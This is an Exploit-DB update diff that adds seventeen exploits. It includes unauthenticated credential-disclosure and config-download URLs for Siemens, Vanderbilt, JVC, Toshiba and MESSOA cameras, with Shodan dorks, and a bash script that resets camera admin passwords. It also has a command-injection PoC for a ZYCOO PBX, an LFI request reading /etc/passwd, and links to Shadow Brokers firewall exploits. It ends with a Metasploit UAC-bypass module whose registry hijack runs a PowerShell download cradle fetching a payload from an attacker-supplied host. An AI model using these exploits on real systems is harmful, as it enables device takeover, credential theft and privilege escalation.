DB: 2016-08-20

17 new exploits

Too many to list!

platforms/cgi/webapps/40262.txt

@@ -0,0 +1,42 @@
+# 
+#
+#  Multiple SIEMENS IP Cameras auth bypass configuration download
+#
+#  Tested: 
+#  SIEMENS IP Camera CCID1410-ST X.1.0.24
+#  SIEMENS IP Camera CCMW1025 x.2.2.1798
+#  SIEMENS IP Camera CCMS2025 x.2.2.1798
+#  SIEMENS IP Camera CVMS2025-IR x.2.2.1798
+#  SIEMENS IP Camera CVMS2025-IR CxMS2025_V2458
+#  SIEMENS IP Camera CVMS2025-IR CxMS2025_V2458_SP1
+#  SIEMENS IP Camera CCPW5025-IR CCPWx025_V0.1.58
+#  
+#  ...and more, more devices who use same firmware
+#
+#  Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
+#  http://www.ethical-hacker.org/
+#  https://www.facebook.com/ethicalhackerorg
+#  
+#  Disclaimer:
+#  This or previous programs is for Educational
+#  purpose ONLY. Do not use it without permission.
+#  The usual disclaimer applies, especially the
+#  fact that Todor Donev is not liable for any
+#  damages caused by direct or indirect use of the
+#  information or functionality provided by these
+#  programs. The author or any Internet provider
+#  bears NO responsibility for content or misuse
+#  of these programs or any derivatives thereof.
+#  By using these programs you accept the fact
+#  that any damage (dataloss, system crash,
+#  system compromise, etc.) caused by the use
+#  of these programs is not Todor Donev's
+#  responsibility.
+#  
+#  Use them at your own risk!
+#
+#  
+ 
+http://TARGET/cgi-bin/chklogin.cgi?file=config.ini
+http://TARGET/cgi-bin/check.cgi?file=ikwd03conf.ini
+

platforms/cgi/webapps/40263.txt

@@ -0,0 +1,40 @@
+1. Advisory Information
+========================================
+Title                   : Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) Remote Credentials Disclosure
+Vendor Homepage         : https://is.spiap.com/
+Remotely Exploitable	: Yes
+Tested on Camera types	: CCPW3025-IR , CVMW3025-IR
+Product References      : https://is.spiap.com/products/video/1_cameras/11_ip_camerars/bullet-kameror/v54561-c117-a100.html
++                       : https://uk.spiap.com/products/video/1_cameras/11_ip_camerars/114_vandal_resistent_dome_cameras/cvmw3025-ir.html
+Vulnerability           : Username / Password Disclosure (Critical/High)
+Shodan Dork             : title:"Vanderbilt IP-Camera"
+Date                    : 19/08/2016
+Author                  : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+ 
+ 
+2. CREDIT
+========================================
+This vulnerability was identified during penetration test by Yakir Wizman.
+  
+
+3. Description
+========================================
+Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) allows to unauthenticated user disclose the username & password remotely by simple request which made by browser.
+
+
+4. Proof-of-Concept:
+========================================
+Simply go to the following url:
+http://host:port/cgi-bin/readfile.cgi?query=ADMINID
+
+Should return some javascript variable which contain the credentials and other configuration vars:
+var Adm_ID="admin"; var Adm_Pass1=“admin”; var Adm_Pass2=“admin”; var Language=“en”; var Logoff_Time="0"; 
+
+-----------------------------------------------
+
+Login @ http://host:port/cgi-bin/chklogin.cgi
+
+
+5. SOLUTION
+========================================
+Contact the vendor for further information regarding the proper mitigation of this vulnerability.

platforms/cgi/webapps/40264.txt

@@ -0,0 +1,38 @@
+1. Advisory Information
+========================================
+Title                   : JVC IP-Camera (VN-T216VPRU) Remote Credentials Disclosure
+Vendor Homepage         : http://pro.jvc.com/
+Remotely Exploitable	: Yes
+Tested on Camera types	: VN-T216VPRU
+Product References      : http://pro.jvc.com/prof/attributes/features.jsp?model_id=MDL102145
+Vulnerability           : Username / Password Disclosure (Critical/High)
+Date                    : 19/08/2016
+Author                  : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+ 
+ 
+2. CREDIT
+========================================
+This vulnerability was identified during penetration test by Yakir Wizman.
+  
+
+3. Description
+========================================
+JVC IP-Camera (VN-T216VPRU) allows to unauthenticated user disclose the username & password remotely by simple request which made by browser.
+
+
+4. Proof-of-Concept:
+========================================
+Simply go to the following url:
+http://host:port/cgi-bin/readfile.cgi?query=ADMINID
+
+Should return some javascript variable which contain the credentials and other configuration vars:
+var Adm_ID="admin"; var Adm_Pass1=“admin”; var Adm_Pass2=“admin”; var Language=“en”; var Logoff_Time="0"; 
+
+-----------------------------------------------
+
+Login @ http://host:port/cgi-bin/chklogin.cgi
+
+
+5. SOLUTION
+========================================
+Contact the vendor for further information regarding the proper mitigation of this vulnerability.

platforms/cgi/webapps/40265.txt

@@ -0,0 +1,56 @@
+1. Advisory Information
+========================================
+Title                   : C2S DVR Management Remote Credentials Disclosure & Authentication Bypass
+Vendor Homepage         : http://www.cash2s.com/en/
+Remotely Exploitable	: Yes
+Tested on Camera types	: IRDOME-II-C2S, IRBOX-II-C2S, DVR
+Vulnerabilities         : Credentials Disclosure
++                       : Authentication bypass
+Date                    : 19/08/2016
+Shodan Dork             : html:write.cgi "Content-length: 2676"
+Author                  : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+ 
+ 
+2. CREDIT
+========================================
+This vulnerability was identified during penetration test by Yakir Wizman.
+  
+
+3. Description
+========================================
+C2S DVR allows to unauthenticated user disclose the username & password remotely by simple request to the server page 'read.cgi?page=2' which can be made by browser or burp/fiddler.
+Moreover, an attacker could easily access to password change page without any authentication, thats happen cuase the web application does not perform any session management.
+
+
+4. Proof-of-Concept:
+========================================
+Remote Credentials Disclosure:
+-----------------------------------------------
+Simply go to the following url to read the credentials:
+http://host:port/cgi-bin/read.cgi?page=2
+
+Should return some javascript variable which contain the credentials and other configuration vars:
+
+var pw_enflag = "1";
+var pw_adminpw = "12345";
+var pw_retype1 = "12345";
+var pw_userpw = "56789";
+var pw_retype2 = "56789";
+var pw_autolock = "0";
+
+
+Login @ http://host:port/
+-----------------------------------------------
+
+
+Authentication Bypass:
+-----------------------------------------------
+The application does not require a valid session for any page on the server, for example you can access to 'password.htm' which allows you to change/disclose the admin password with just a few clicks.
+
+http://host:port/password.htm?parm1=&parm2=1
+
+
+
+5. SOLUTION
+========================================
+Contact the vendor for further information regarding the proper mitigation of this vulnerability.

platforms/cgi/webapps/40266.txt

@@ -0,0 +1,30 @@
+# 
+#
+#  TOSHIBA IK-WP41A IP-Camera auth bypass configuration download
+#
+#  Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
+#  http://www.ethical-hacker.org/
+#  https://www.facebook.com/ethicalhackerorg
+#  
+#  Disclaimer:
+#  This or previous programs is for Educational
+#  purpose ONLY. Do not use it without permission.
+#  The usual disclaimer applies, especially the
+#  fact that Todor Donev is not liable for any
+#  damages caused by direct or indirect use of the
+#  information or functionality provided by these
+#  programs. The author or any Internet provider
+#  bears NO responsibility for content or misuse
+#  of these programs or any derivatives thereof.
+#  By using these programs you accept the fact
+#  that any damage (dataloss, system crash,
+#  system compromise, etc.) caused by the use
+#  of these programs is not Todor Donev's
+#  responsibility.
+#  
+#  Use them at your own risk!
+#
+#  
+ 
+http://TARGET/cgi-bin/chklogin.cgi?file=config.ini
+

platforms/cgi/webapps/40267.txt

@@ -0,0 +1,30 @@
+# 
+#
+#  MESSOA NIC990 IP-Camera auth bypass configuration download
+#
+#  Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
+#  http://www.ethical-hacker.org/
+#  https://www.facebook.com/ethicalhackerorg
+#  
+#  Disclaimer:
+#  This or previous programs is for Educational
+#  purpose ONLY. Do not use it without permission.
+#  The usual disclaimer applies, especially the
+#  fact that Todor Donev is not liable for any
+#  damages caused by direct or indirect use of the
+#  information or functionality provided by these
+#  programs. The author or any Internet provider
+#  bears NO responsibility for content or misuse
+#  of these programs or any derivatives thereof.
+#  By using these programs you accept the fact
+#  that any damage (dataloss, system crash,
+#  system compromise, etc.) caused by the use
+#  of these programs is not Todor Donev's
+#  responsibility.
+#  
+#  Use them at your own risk!
+#
+#  
+ 
+http://TARGET/cgi-bin/chklogin.cgi?file=config.ini
+

platforms/cgi/webapps/40269.txt

@@ -0,0 +1,61 @@
+Vulnerable hardware : ZYCOO IP phone system
+Vendor : zycoo.com
+Author : Ahmed sultan (@0x4148)
+Email : 0x4148@gmail.com
+
+Summary : According to the vendor's site , 
+CooVox Series IP Phone System is the most innovative solution for VoIP telecommunication in SMB (Small and Medium-sized Business) market.
+They provide not only traditional PBX functions such as automated attendant and voicemail,
+but also offer many advance telephony features, including remote extensions, remote office connection,
+IVR, call recording, call detail records(CDR)…
+
+Vulnerable file : /www/cgi-bin/system_cmd.cgi
+
+Code shot : 
+
+#!/bin/hush
+printf '\r\n'
+if [ -n "$REQUEST_METHOD" ]; then
+        case "$REQUEST_METHOD" in
+        (GET)
+        if [ -n "$QUERY_STRING" ]; then
+        for args in `echo "$QUERY_STRING" | tr "&" " "`
+        do
+                param=`echo "$args" | cut -d "=" -f 1`
+                value=`echo "$args" | cut -d "=" -f 2`
+                eval "export $param=$value"
+        done
+        fi
+        ;;
+  esac
+fi
+INI_FILE=/etc/asterisk/manager.conf
+INI_SECTION=$username
+eval `sed -e 's/[[:space:]]*\=[[:space:]]*/=/g' \
+    -e 's/;.*$//' \
+    -e 's/[[:space:]]*$//' \
+    -e 's/^[[:space:]]*//' \
+    -e "s/^\(.*\)=\([^\"']*\)$/\1=\'\2\'/" \
+   < $INI_FILE \
+    | sed -n -e "/^\[$INI_SECTION\]/,/^\s*\[/{/^[^;].*\=.*/p;}"`
+password="`/etc/scripts/decodeURI $password`"
+[ -z "$secret" ] && secret=`/etc/scripts/getkeyvalue.sh ${INI_SECTION} vmsecret`
+if [ "$password" = "$secret" ]; then
+        cmd=`echo $cmd | sed 's/%20/ /g'`
+#       cmd=`echo $cmd | sed -e's/%\([0-9A-F][0-9A-F]\)/\\\\\x\1/g;s/?r//g' | xargs echo`
+        $cmd
+
+the GET parameter cmd is freely available to directly execute system commands with no prior required authentication
+which lead to full hardware takeover
+
+POC
+[0x4148:/R1z]# curl http://server:9999/cgi-bin/system_cmd.cgi\?cmd\='cat%20/etc/passwd'
+root:$1$C6ouMLFa$pb2/Bu1bcWpBNcX38jTva0:0:0:root:/:/bin/sh
+nobody:x:99:99:Nobody::
+
+Also by reading file /etc/asterisk/manager.conf
+hardware admin's password can be obtained in plain text
+
+Fixing?
+Unfortunately the hardware frontend really depend on this file , and the vendor is super lazy on replying on the emails regarding this vulnerability
+so , best fixation for now is enabling the web interface browsing from the local network only

platforms/cgi/webapps/40272.txt

@@ -0,0 +1,8 @@
+# Exploit Title: TOPSEC Firewalls - Remote Code Execution (ELIGIBLECONTESTANT)
+# Date: 19-08-2016
+# Exploit Author: Shadow Brokers
+# Vendor Homepage: http://www.topsec.com.cn/
+
+
+Full Exploit:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40272.zip

platforms/cgi/webapps/40273.txt

@@ -0,0 +1,8 @@
+# Exploit Title: TOPSEC Firewalls - Remote Code Execution (ELIGIBLECANDIDATE)
+# Date: 19-08-2016
+# Exploit Author: Shadow Brokers
+# Vendor Homepage: http://www.topsec.com.cn/
+
+
+Full Exploit:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40273.zip

platforms/cgi/webapps/40274.txt

@@ -0,0 +1,8 @@
+# Exploit Title: TOPSEC Firewalls - Remote Code Execution (ELIGIBLEBOMBSHELL)
+# Date: 19-08-2016
+# Exploit Author: Shadow Brokers
+# Vendor Homepage: http://www.topsec.com.cn/
+
+
+Full Exploit:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40274.zip

platforms/cgi/webapps/40277.sh

@@ -0,0 +1,52 @@
+# 
+#
+#  Multiple MESSOA IP-Cameras auth bypass admin user/password changer
+#
+#  Tested:
+#  MESSOA NIC 835 Release: X.2.1.8
+#  MESSOA NIC 835-HN5 Release: X.2.1.17
+#  MESSOA NIC 836 Release: X.2.1.7
+#  MESSOA NDZ 860 Release: X.3.0.6.1
+#  MESSOA
+#
+#  Copyright 2016 (c) Todor Donev 
+#  <todor.donev at gmail.com>
+#  http://www.ethical-hacker.org/
+#  https://www.facebook.com/ethicalhackerorg
+#  
+#  Disclaimer:
+#  This or previous programs is for Educational
+#  purpose ONLY. Do not use it without permission.
+#  The usual disclaimer applies, especially the
+#  fact that Todor Donev is not liable for any
+#  damages caused by direct or indirect use of the
+#  information or functionality provided by these
+#  programs. The author or any Internet provider
+#  bears NO responsibility for content or misuse
+#  of these programs or any derivatives thereof.
+#  By using these programs you accept the fact
+#  that any damage (dataloss, system crash,
+#  system compromise, etc.) caused by the use
+#  of these programs is not Todor Donev's
+#  responsibility.
+#  
+#  Use them at your own risk!
+#  
+ 
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+        echo "  [ MESSOA IP-Cameras auth bypass admin user/password changer"
+        echo "  [ ==="
+        echo "  [ Usage: $0 <target> <user> <password>"
+        echo "  [ Example: $0 192.168.1.200:80 hacker teflon"
+        echo "  [ ==="
+        echo "  [ Copyright 2016 (c) Todor Donev  <todor.donev at gmail.com>" 
+        echo "  [ Website:   http://www.ethical-hacker.org/"
+        echo "  [ Facebook:  https://www.facebook.com/ethicalhackerorg "
+        exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+        echo "  [ Error : libwww-perl not found =/"
+        exit;
+fi
+        GET "http://$1/cgi-bin/writefile.cgi?DEFonoff_adm=&Adm_ID=$2&Adm_Pass1=$3&Adm_Pass2=$3&UpSectionName=ADMINID" 0&> /dev/null <&1

platforms/hardware/local/40271.txt

@@ -0,0 +1,8 @@
+# Exploit Title: Cisco ASA / PIX - Privilege Escalation (EPICBANANA)
+# Date: 19-08-2016
+# Exploit Author: Shadow Brokers
+# Vendor Homepage: http://www.cisco.com/
+
+ 
+Full Exploit:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40271.zip

platforms/hardware/remote/40275.txt

@@ -0,0 +1,8 @@
+# Exploit Title: TOPSEC Firewalls - Remote Exploit (ELIGIBLEBACHELOR)
+# Date: 19-08-2016
+# Exploit Author: Shadow Brokers
+# Vendor Homepage: http://www.topsec.com.cn/
+
+
+Full Exploit:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40275.zip

platforms/hardware/webapps/40276.txt

@@ -0,0 +1,8 @@
+# Exploit Title: Fortigate Firewalls - Remote Code Execution (EGREGIOUSBLUNDER)
+# Date: 19-08-2016
+# Exploit Author: Shadow Brokers
+# Vendor Homepage: https://www.fortinet.com/products/fortigate/
+
+
+Full Exploit:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40276.zip

platforms/linux/local/40270.txt

@@ -0,0 +1,8 @@
+# Exploit Title: WatchGuard Firewalls - ifconfig Privilege Escalation (ESCALATEPLOWMAN)
+# Date: 19-08-2016
+# Exploit Author: Shadow Brokers
+# Vendor Homepage: http://www.watchguard.com/
+
+ 
+Full Exploit:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40270.zip

platforms/php/webapps/40278.txt

@@ -0,0 +1,66 @@
+Vulnerable hardware : tcpbx voip distro
+Vendor : www.tcpbx.org
+Author : Ahmed sultan (@0x4148)
+Email : 0x4148@gmail.com
+
+Summary : According to the vendor's site ,
+tcPbX is a complete and functional VoIP phone system based on Asterisk open
+source software and CentOS operating system.
+The simplified installation and the new administration portal allow you to
+have a full featured phone system in less than an hour without specific
+skills on linux or asterisk
+
+Vulnerable file : /var/www/html/tcpbx/index.php
+The software suffer from LFI flaw because of the tcpbx_lang parameter isn't
+sanitized before being proceeded in the file
+
+Request
+GET /tcpbx/ HTTP/1.1
+Host: server
+User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:47.0)
+Gecko/20100101 Firefox/47.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: tcpbx_lang=../../../../../../../../../../etc/passwd%00;
+PHPSESSID=cupsei1iqmv2bqa81pkcvg4jg1
+Connection: close
+Cache-Control: max-age=0
+-----------------------------------
+Response
+HTTP/1.1 200 OK
+Date: Fri, 19 Aug 2016 15:45:30 GMT
+Server: Apache/2.2.15 (CentOS)
+X-Powered-By: PHP/5.3.3
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
+pre-check=0
+Pragma: no-cache
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Content-Length: 23874
+
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+games:x:12:100:games:/usr/games:/sbin/nologin
+gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
+ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+nobody:x:99:99:Nobody:/:/sbin/nologin
+vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
+sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+ntp:x:38:38::/etc/ntp:/sbin/nologin
+saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
+mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
+smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
+apache:x:48:48:Apache:/var/www:/sbin/nologin
+mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
+postfix:x:89:89::/var/spool/postfix:/sbin/nologin

platforms/windows/local/40268.rb

@@ -0,0 +1,137 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::EXE
+  include Post::File
+  include Post::Windows::Priv
+  include Post::Windows::Runas
+  include Post::Windows::Registry
+  include Post::Windows::Powershell
+
+
+  def initialize(info={})
+    super( update_info(info,
+      'Name'          => 'Windows Escalate UAC Protection Bypass with Fileless',
+      'Description'   => %q{
+        This module will bypass Windows UAC by utilizing eventvwr.exe and hijacking entries registry on Windows.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+        'Matt Graeber',
+		'Enigma0x3',
+        'Pablo Gonzalez' # Port to local exploit
+        ],
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ],
+      'Targets'       => [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+      ],
+      'DefaultTarget' => 0,
+      'References'    => [
+        [ 'URL', 'https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/' ],['URL','http://www.elladodelmal.com/2016/08/como-ownear-windows-7-y-windows-10-con.html'],
+      ],
+      'DisclosureDate'=> "Aug 15 2016"
+    ))
+
+    register_options([
+      OptString.new('FILE_DYNAMIC_PAYLOAD',[true,'Payload PSH Encoded will be generated here (Not include webserver path)']),
+      OptString.new('IPHOST',[true,'IP WebServer where File Payload will be downloaded']),
+      OptBool.new('LOCAL',[true,'File Payload is in this machine?',true] ),			
+    ])
+
+  end
+
+  def check_permissions!
+    # Check if you are an admin
+    vprint_status('Checking admin status...')
+    admin_group = is_in_admin_group?
+
+    if admin_group.nil?
+      print_error('Either whoami is not there or failed to execute')
+      print_error('Continuing under assumption you already checked...')
+    else
+      if admin_group
+        print_good('Part of Administrators group! Continuing...')
+      else
+        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+      end
+    end
+
+    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
+    end
+  end
+
+  def exploit
+    validate_environment!
+
+    case get_uac_level
+    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+      fail_with(Failure::NotVulnerable,
+        "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."
+      )
+    when UAC_DEFAULT
+      print_good 'UAC is set to Default'
+      print_good 'BypassUAC can bypass this setting, continuing...'
+    when UAC_NO_PROMPT
+      print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
+      runas_method
+      return
+    end
+
+    keys = registry_enumkeys('HKCU\Software\Classes\mscfile\shell\open\command')
+
+    if keys == nil
+	print_good("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command not exist!")
+    end    
+
+    key = registry_createkey('HKCU\Software\Classes\mscfile\shell\open\command')  
+    reg = "IEX (New-Object Net.WebClient).DownloadString(\'http://#{datastore['IPHOST']}/#{datastore['FILE_DYNAMIC_PAYLOAD']}\')"
+
+    command = cmd_psh_payload(payload.encoded, 'x86',{:remove_comspec => true,:encode_final_payload => true})
+    if datastore['LOCAL']
+        if File.exists?("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}")
+	   File.delete("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}")
+	end
+	file_local_write("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}",command)
+    end
+
+    result = registry_setvaldata('HKCU\Software\Classes\mscfile\shell\open\command','bypass','C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -C ' + reg,'REG_SZ')
+    if result
+	execute_script("cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcANwBiADAASABZAEIAeABKAGwAaQBVAG0ATAAyADMASwBlADMAOQBLADkAVQByAFgANABIAFMAaABDAEkAQgBnAEUAeQBUAFkAawBFAEEAUQA3AE0ARwBJAHoAZQBhAFMANwBCADEAcABSAHkATQBwAHEAeQBxAEIAeQBtAFYAVwBaAFYAMQBtAEYAawBEAE0ANwBaADIAOAA5ADkANQA3ADcANwAzADMAMwBuAHYAdgB2AGYAZQA2AE8ANQAxAE8ASgAvAGYAZgAvAHoAOQBjAFoAbQBRAEIAYgBQAGIATwBTAHQAcgBKAG4AaQBHAEEAcQBzAGcAZgBQADMANQA4AEgAegA4AGkALwBxAC8ALwArADkAZgA0ADMAWAA2AE4AKwB0AGQAWQAvAHgAcgB0AHIANQBIADkARwB1AG0AdgA4AFIAbgA5AC8ANgBOAGYANAA5AHUALwB4AHUALwAxAGEANQB6ADgARwBsAC8AOQBHAG8AOQArAGoAZAAvADMAMQAzAGoAOQBhADEAUwAvAHgAagBsADkAZQAwAFgAZgAxADcAOQBHAFQAcAArAGMALwBCAG8AbAAvAGQANwBRAGYAegBuADkALwAvAGYAOQBOAFIAYgAwADcANQBUAGEARgBQAFEANQB2AG0AOQArAGoAVABuADkATABPAG0ALwAzADUAZgBlAFgAZABIAHYAUwAvAHAAdABTAHIAOAB2ADYATAArAE0ALwBwAHAAUgBIADcALwB4AHIANQBGAFEAegB4AFgAQgBuAEgARQBMADYAWAB2AHIAMQAvAGkAYwAvAG0AcAAvAGoAZQAxAGYANAA0AHoAKwB6AGEAbgA5AFMAMgBvAGgAVQBHAHIANgA1AEoAcgBhAGIATgBOAG4ARwBmADAAKwBwADkAOQA5ADMATABkAC8AagBSAGYAMABjADAARQB0ADAAMQAvAGoANAAxADkAagBRAG0AMQBYAGkAdQBmAEgAdgA4AGEAZABYADIATQBjAGYASQBMAGUAWAAxAEQATABLADYAKwBuAEwAcgBSAG4AagBOADIAVQA0AGYAMABNAC8AYgAvAGIAUABvAGEAWgBqADgASABXAHIALwBHAFUAZgBqAHUAbgBUADkAWgBFAGkANQBaAHcAKwBKAGoAYgAvAEMAUgA5AFUAdABKAG4ATwBmAGYAbwBVADIAQwA3AEIALwBNAE4ANAA0AHkAVwBEAGYAMQBkAEUANAAyAFgAdgA4AFoARgBGAEwAcwB2AEcAWABOAGcAZwBOADcASwAvAHcAYwA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=")
+	print_good('Created registry entries to hijack!')
+    end
+
+    r = session.sys.process.execute("cmd.exe /c c:\\windows\\system32\\eventvwr.exe",nil,{'Hidden' => true, 'Channelized' => true})
+    check_permissions!
+
+  end
+
+  def validate_environment!
+    fail_with(Failure::None, 'Already in elevated state') if is_admin? or is_system?
+
+    winver = sysinfo['OS']
+
+    unless winver =~ /Windows Vista|Windows 2008|Windows [78]/
+      fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.")
+    end
+
+    if is_uac_enabled?
+      print_status 'UAC is Enabled, checking level...'
+    else
+      if is_in_admin_group?
+        fail_with(Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...')
+      else
+        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+      end
+    end
+  end
+end